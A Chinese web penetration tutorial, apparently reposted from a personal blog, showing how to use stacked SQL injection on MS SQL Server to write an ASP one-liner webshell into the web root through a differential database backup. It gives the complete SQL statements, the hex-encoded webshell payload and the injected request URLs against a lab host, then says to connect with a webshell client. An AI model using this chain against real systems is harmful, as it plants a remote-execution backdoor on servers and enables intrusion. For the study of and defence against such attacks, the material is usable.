Web渗透之mssql差异备份getshell

admin

101399
文章

87
评论

2021年7月10日23:56:28评论84 views字数 1180阅读3分56秒阅读模式

简介

差异备份数据库得到webshell。在sql server 里dbo和sa权限都有备份数据库权限，我们可以把数据库备份称asp文件，这样我们就可以通过mssqlserver的备份数据库功能生成一个网页小马。

差异备份的流程大概这样：

1.完整备份一次(保存位置当然可以改)

backup database 库名 to disk = 'c:ddd.bak';--

2.创建表并插入数据

create table [dbo].[dtest] ([cmd] [image]);--insert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E);--

3.进行差异备份

backup database 库名 to disk='目标位置d.asp' WITH DIFFERENTIAL,FORMAT;--

上面

0x3C25657865637574652872657175657374282261222929253E

就是一句话木马的内容：<%execute(request("a"))%>

例子

测试例子中我目标网站的绝对路径是E:wwwrootasp_sqli，数据库名是asp_test

1、

http://192.168.5.21:81/index.asp?id=1;backup%20database%20asp_test%20to%20disk%20=%27E:wwwrootasp_sqliddd.bak%27;--

Web渗透之mssql差异备份getshell

2、

http://192.168.5.21:81/index.asp?id=1;create%20table%20[dbo].[dtest]%20([cmd][image]);--http://192.168.5.21:81/index.asp?id=1;insert%20into%20dtest(cmd)values(0x3C25657865637574652872657175657374282261222929253E);--

Web渗透之mssql差异备份getshell

3、

http://192.168.5.21:81/index.asp?id=1;backup%20database%20asp_test%20to%20disk=%27E:wwwrootasp_sqlid.asp%27%20WITH%20DIFFERENTIAL,FORMAT;--

Web渗透之mssql差异备份getshell

菜刀连接d.asp即可。

Web渗透之mssql差异备份getshell

转载自：卿先生博客地址：https://www.cnblogs.com/-qing-/p/10692824.html

没有专业运营团队，纯个人凭着空闲时间的学习，通过网络搜集与学习整理的资料记录并分享。

如果觉得文章对你有帮助，请支持下点击右下角“在看”

Web渗透之mssql差异备份getshell

本文始发于微信公众号（LemonSec）：Web渗透之mssql差异备份getshell

左青龙
微信扫一扫

右白虎
微信扫一扫

Web渗透之mssql差异备份getshell

简介

差异备份的流程大概这样：

例子

干货 | 支付金额类漏洞挖掘技巧总结

记一次价格500rmb的短信轰炸

【相关分享】内网信息收集

如何构建自己的自定义 C2 框架

如何使用CsWhispers向C#项目添加DInvoke和间接系统调用方法

深信服防火墙AF策略路由如何配置？

【OSCP】gigachad

CVE-2024-0015复现 (DubheCTF DayDream)

《生成式人工智能服务安全基本要求》原文参阅

网络安全工程师必知的系统敏感目录

发表评论

在线咨询

微信